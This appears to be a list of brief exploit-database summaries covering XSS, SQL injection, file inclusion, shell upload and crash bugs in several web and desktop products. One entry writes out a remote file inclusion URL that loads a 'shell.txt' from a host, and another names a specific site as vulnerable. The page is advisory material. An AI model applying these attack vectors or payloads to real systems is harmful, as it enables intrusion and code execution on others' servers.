The Wordpress Plugin Ninja Forms version 3.3.17 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious script code into the affected URLs. This can lead to the execution of arbitrary code or the disclosure of sensitive information to the attacker.
This vulnerability allows an attacker to include remote files in the vulnerable file /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php. The exploit URL is http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?. The vulnerability occurs due to the presence of the vulnerable variable dir_ws in the code at line number 78.
This exploit allows an attacker to perform a remote SQL injection attack on miniBB 2.1. By manipulating the 'table' parameter in the URL, an attacker can inject SQL code into the query, potentially leading to unauthorized access to the database and disclosure of usernames and passwords. The exploit includes a proof of concept URL.
Downloadable pre-installed version of PHP-Proxy 5.1.0 make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server.
This exploit allows an attacker to upload a PHP shell instead of an image while creating a profile on ProfileCMS v1.0. The vulnerable script can be found at http://slrate.com/profiles. By exploiting this vulnerability, an attacker can gain unauthorized access to the system and execute arbitrary commands.
The exploit causes a denial of service in Bosch Video Management System 8.0 Configuration Client by causing it to crash. This is achieved by opening the Configuration Client and inputting a specific set of values in the fields. The exploit is executed through a Python script that generates a specific payload and saves it in a file called 'bosch.txt'. When this file is copied into the Configuration Client, it causes the program to crash.
This module can be used to execute a payload on Atlassian Jira via the Universal Plugin Manager(UPM). The module requires valid login credentials to an account that has access to the plugin manager. The payload is uploaded as a JAR archive containing a servlet using a POST request against the UPM component. The check command will test the validity of user supplied credentials and test for access to the plugin manager.
The MSRS v.1.21 application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file from a remote server. This can lead to remote code execution or unauthorized access to sensitive files on the target system.
The Helpdezk 1.1.1 software is vulnerable to a SQL Injection attack through the 'query' parameter. An attacker can manipulate the query parameter to execute arbitrary SQL commands on the database.
This is a proof-of-concept exploit that crashes the target when the target is run under a memory sanitiser such as ASan / Valgrind.
Services By CQR